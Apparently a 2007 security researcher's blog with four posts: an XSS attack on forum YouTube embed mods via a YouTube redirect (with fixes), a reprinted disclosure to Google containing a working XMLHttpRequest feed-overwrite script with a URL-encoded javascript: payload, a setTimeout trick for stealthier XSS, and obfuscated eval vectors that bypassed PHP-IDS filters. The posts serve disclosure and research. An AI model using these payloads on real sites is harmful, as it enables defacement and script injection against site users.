Sunday, September 30, 2007

Universal youtube mods XSS explained in 7 steps

Well, I want to explain first, this was not my idea, someone at irc.irchighway.net/#slackers discussed about this a while ago, but he wasn't able to find a redirection URL at youtube.

A couple of days ago I found such URL, and now I can't remember who was he, please if you read this, send me an e-mail to modify this post for the credits.

[[ UPDATE ]] kuza55 found out that Kyran was the one to come with the idea [[ /UPDATE ]]

Well, discusing this with the guys at w4ck1ng it appears that the vulnerability is rather complex to understand.

  1. First, we know that if we can embed a flash movie into a site, we can make XSS attacks, by means of getURL("javascript:code_here");
  2. Second, we know that we cant embed any arbitrary movie into any forum (at least not by default).
  3. Third, we know there are thousands of forums that have Youtube mods instaled, so their users can link to movies, and watch them without leaving the site.
  4. Fourth, the mods for youtube (at least the ones I found) have no regular expressions for validating that the video linked is valid, and they do: http://www.youtube.com/v/{param_here} thinking, that in such way an attacker wont be able to change the domain.
  5. Fifth, Youtube doesn't have any visible redirection URL that forwards to an arbitrary site, so if you found a redirection page, you could do.. http://www.youtube.com/v/../redirection?page=http://your.swf.exploit/
  6. Sixth, the redirection page inside youtube is http://www.youtube.com/confirm_email?next=http://new.url/
  7. Seventh, using step 4, 5 and 6 the exploit is like this: [youtube=1,1]../confirm_email?next=http://exploit.com/swf[/youtube]
Well, I think that's all.. the easiest way of patching this vulnerability is simply adding a allowScriptAcces="never" in the object tag of your mod.. anyway, attackers will still be able to redirect to their movies, for stopping that you need to make a regular expression that matches the input with ^[a-zA-Z0-9_]{11}$
(like the phpBB mod does)

[EDIT]
List of SMF vulnerable mod's:

Not vulnerable:

Unsafe IPB youtube mod instalation:
[/EDIT]

Friday, September 28, 2007

Google Mashups Vulnerability

yay, I wanted to be part of this hell of a week (Google's Dark Week).

Here is the vulnerability I reported to google, and it appears to be a "design error" (and there is no fix, without breaking other things).

With this vulnerability you can "deface" any google-mashups project, creating your own XML-RPC to the GWT server, and change the contents of any feed.

The report I sent to Google is this:






Supose, you are the creator of http://gallery.googlemashups.com/
if you include a list, for a local feed, then any attacker from the world will be able to modify all the content in your website.

This is maybe a design error, and as I see it, it's pretty dificult to fix.

I've made a demonstration to http://gallery.googlemashups.com/
Enter to the website, and go to the last page, there you will see that the last item was modified.

to do so, you just need to execute the following code:


with(new XMLHttpRequest()){
open("POST","http://gallery.googlemashups.com/feeds/app/galleryApps",true);
setRequestHeader("Content-Type","application/atom+xml; charset=utf-8");
setRequestHeader("X-Gm-Validate","ASDFGHJKLÑPQWERRTYUIOPZXCVBNMUJHFDDDEFFDSSCFGGTFDQWERTYUIYTRREWWWQQ");
setRequestHeader("X-GData-Client","JavaScript-V1.0-Google Mashup Editor");
send(unescape("%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%20%65%6e%63%6f%64%69%6e%67%3d%22%55%54%46%2d%38%22%20%3f%3e%0d%0a%3c%61%74%6f%6d%3a%65%6e%74%72%79%20%78%6d%6c%6e%73%3a%67%6d%64%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6d%64%2f%32%30%30%37%22%20%67%3d%22%63%6f%6d%2e%67%6f%6f%67%6c%65%2e%67%77%74%2e%63%6f%72%65%2e%63%6c%69%65%6e%74%2e%4a%61%76%61%53%63%72%69%70%74%4f%62%6a%65%63%74%22%20%78%6d%6c%6e%73%3a%61%74%6f%6d%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%35%2f%41%74%6f%6d%22%20%78%6d%6c%6e%73%3a%67%64%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%2f%32%30%30%35%22%20%78%6d%6c%6e%73%3a%67%6d%3d%22%68%74%74%70%3a%2f%2f%62%61%73%65%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%73%2d%6d%65%74%61%64%61%74%61%2f%31%2e%30%22%20%78%6d%6c%6e%73%3a%67%3d%22%68%74%74%70%3a%2f%2f%62%61%73%65%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%73%2f%31%2e%30%22%20%78%6d%6c%6e%73%3a%67%43%61%6c%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%43%61%6c%2f%32%30%30%35%22%20%78%6d%6c%6e%73%3a%73%74%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%74%2f%32%30%30%36%22%20%78%6d%6c%6e%73%3a%61%70%70%73%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%70%70%73%2f%32%30%30%36%22%20%78%6d%6c%6e%73%3a%78%73%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%31%39%39%39%2f%58%53%4c%2f%54%72%61%6e%73%66%6f%72%6d%22%20%78%6d%6c%6e%73%3a%78%68%74%6d%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%31%39%39%39%2f%78%68%74%6d%6c%22%20%78%6d%6c%6e%73%3a%6f%70%65%6e%53%65%61%72%63%68%3d%22%68%74%74%70%3a%2f%2f%61%39%2e%63%6f%6d%2f%2d%2f%73%70%65%63%2f%6f%70%65%6e%73%65%61%72%63%68%72%73%73%2f%31%2e%30%2f%22%20%78%6d%6c%6e%73%3a%6d%65%64%69%61%3d%22%68%74%74%70%3a%2f%2f%73%65%61%72%63%68%2e%79%61%68%6f%6f%2e%63%6f%6d%2f%6d%72%73%73%22%20%78%6d%6c%6e%73%3a%67%65%6f%72%73%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%65%6f%72%73%73%2e%6f%72%67%2f%67%65%6f%72%73%73%3d%67%65%6f%72%73%73%22%20%78%6d%6c%6e%73%3a%67%6d%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%6f%70%65%6e%67%69%73%2e%6e%65%74%2f%67%6d%6c%3d%67%6d%6c%22%20%78%6d%6c%6e%73%3a%65%78%69%66%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%70%68%6f%74%6f%73%2f%65%78%69%66%2f%32%30%30%37%3d%65%78%69%66%22%20%78%6d%6c%6e%73%3a%67%6d%73%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6d%73%2f%32%30%30%37%22%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%35%2f%41%74%6f%6d%22%3e%0d%0a%3c%69%64%3e%68%74%74%70%3a%2f%2f%67%61%6c%6c%65%72%79%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%3c%2f%69%64%3e%0d%0a%3c%70%75%62%6c%69%73%68%65%64%3e%32%30%30%37%2d%30%39%2d%30%38%54%30%30%3a%31%39%3a%34%38%2e%36%32%35%5a%3c%2f%70%75%62%6c%69%73%68%65%64%3e%0d%0a%3c%75%70%64%61%74%65%64%3e%32%30%30%37%2d%30%39%2d%30%38%54%30%30%3a%31%39%3a%34%38%2e%36%32%35%5a%3c%2f%75%70%64%61%74%65%64%3e%0d%0a%3c%74%69%74%6c%65%20%74%79%70%65%3d%22%74%65%78%74%22%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%21%21%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%63%6f%6e%74%65%6e%74%20%74%79%70%65%3d%22%74%65%78%74%22%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%21%3c%2f%63%6f%6e%74%65%6e%74%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%73%65%6c%66%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%61%74%6f%6d%20%78%6d%6c%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%2e%31%2e%74%65%73%74%2d%63%32%62%61%34%61%39%39%36%35%35%36%39%31%65%61%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%22%2f%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%65%64%69%74%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%61%74%6f%6d%20%78%6d%6c%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%2e%31%2e%74%65%73%74%2d%63%32%62%61%34%61%39%39%36%35%35%36%39%31%65%61%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%2f%30%22%2f%3e%0d%0a%3c%67%64%3a%61%70%70%4c%69%6e%6b%3e%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%27%47%6f%6f%67%6c%65%4d%61%73%68%75%70%73%20%64%65%73%69%67%6e%20%65%72%72%6f%72%3f%27%29%3b%3c%2f%67%64%3a%61%70%70%4c%69%6e%6b%3e%0d%0a%3c%67%64%3a%69%6d%67%55%52%4c%3e%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%27%47%6f%6f%67%6c%65%4d%61%73%68%75%70%73%20%64%65%73%69%67%6e%20%65%72%72%6f%72%3f%27%29%3b%3c%2f%67%64%3a%69%6d%67%55%52%4c%3e%0d%0a%3c%67%6d%64%3a%61%75%74%68%6f%72%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%3c%2f%67%6d%64%3a%61%75%74%68%6f%72%3e%0d%0a%3c%2f%61%74%6f%6d%3a%65%6e%74%72%79%3e"));
onreadystatechange=function(){
if(readyState==4){
alert(responseText);
}
}
}


you can get the X-Gm-Validate token, by sniffing your connection, the modification of the feeds, doesnt require validation of any type.

Well, that's the first part..
with this information you can modify the content of any item on the feed, but that's not all.
the information passed are not validated at all! so by means of..
link=blah">XSS

I could do a persistent XSS attack, this could completely destroy the project, make a deface or anything.

If you need me to explain further please tell me.





Well, actually there's also another XSS vulnerability in some other services, anyway, they are on their way of fixing them.. so I won't disclose them here (yet).

Thursday, September 06, 2007

Allowing debug in a javascript library

Hi, some days ago I watched John Resig Tech Talk, about building a JavaScript library, where he pointed out some "good habits", when programming, and when doing js libraries, pretty interesting.

Any way, he mentioned that we shouldn't use try&catch because the coder "cant" debug his code, because we trap the error, and he is never able to see it.. so, I thought that an interesting way of letting the "error pass", but still have controll of the library is using setTimeout, to let the code run asynchronously.

The code I submitted to his blog, is:

setTimeout(function(){/*code here*/},0);

So, the error is reported to the user, and we dont loose the control of the code..

Some time after that I thought that, it could also be used for letting code runing in memory.. (but it's cancelled as soon as you leave the website).

Any way, as a programmer, I see this as a technique for running more than 1 process at one, as a security researcher, I see this as a technique for running XSS payloads in a more sigilous way.

Saturday, September 01, 2007

7 minutes to kill a monster.

Well, a response time of 1 week, is said to be good, Mozilla has 10 f***ing days, Google depending on the complexity of the vulnerability takes between 1 day to a few weeks to fix them, but Mario Heiderich, developer of the PHP-IDS, has an amazing 7 minutes time to pull a patch for a vuln.

A week ago, he talked me about a "call for hacking" to PHP-IDS, and I said it would be really difficult, because the last time, the filters where extremely enforced, so I started playing (before the call for hacking was published), and in an hour I found 3 vectors, and made a PoC, of 666 bytes (that's why it's a monster xD), 2 of them where based on Giorgio Maone window.name vector.

So, I asked Mario, if I have to wait until the call for hacking was published, but he pulled the patch immediatelly.

A few minutes later, I found another HTML vector ("style="anything), that was fixed too.

So he decided to interview me, as a price for winning an unstarted contest :P.

The vectors where:

  • open(name)
  • eval(name)
  • (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
I'm sure that Gareth Heyes, and Giorgio Maone will be the next to find some vectors :)